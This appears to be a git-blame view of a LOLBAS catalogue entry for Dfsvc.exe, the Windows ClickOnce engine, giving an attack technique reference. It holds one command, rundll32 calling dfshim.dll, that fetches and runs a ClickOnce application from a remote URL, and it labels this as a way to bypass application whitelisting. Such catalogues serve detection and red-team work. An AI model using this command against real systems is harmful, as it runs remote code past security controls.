2018-06-09 00:15:06 +02:00
|
|
|
---
|
|
|
|
Name: Dfsvc.exe
|
2018-09-24 21:59:43 +02:00
|
|
|
Description: ClickOnce engine in Windows used by .NET
|
|
|
|
Author: 'Oddvar Moe'
|
2018-06-09 00:15:06 +02:00
|
|
|
Created: '2018-05-25'
|
|
|
|
Commands:
|
2018-12-10 18:45:41 +01:00
|
|
|
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
|
|
|
Description: Executes click-once-application from Url
|
2018-09-24 21:59:43 +02:00
|
|
|
Usecase: Use binary to bypass Application whitelisting
|
|
|
|
Category: AWL bypass
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1127
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-12-10 14:28:12 +01:00
|
|
|
Full_Path:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
|
|
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
|
|
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
|
|
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
2018-12-10 14:28:12 +01:00
|
|
|
Code_Sample:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Code:
|
|
|
|
Detection:
|
|
|
|
- IOC:
|
2018-06-09 00:15:06 +02:00
|
|
|
Resources:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
2018-12-10 18:45:41 +01:00
|
|
|
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
2018-09-24 21:59:43 +02:00
|
|
|
Acknowledgement:
|
|
|
|
- Person: Casey Smith
|
|
|
|
Handle: '@subtee'
|
|
|
|
---
|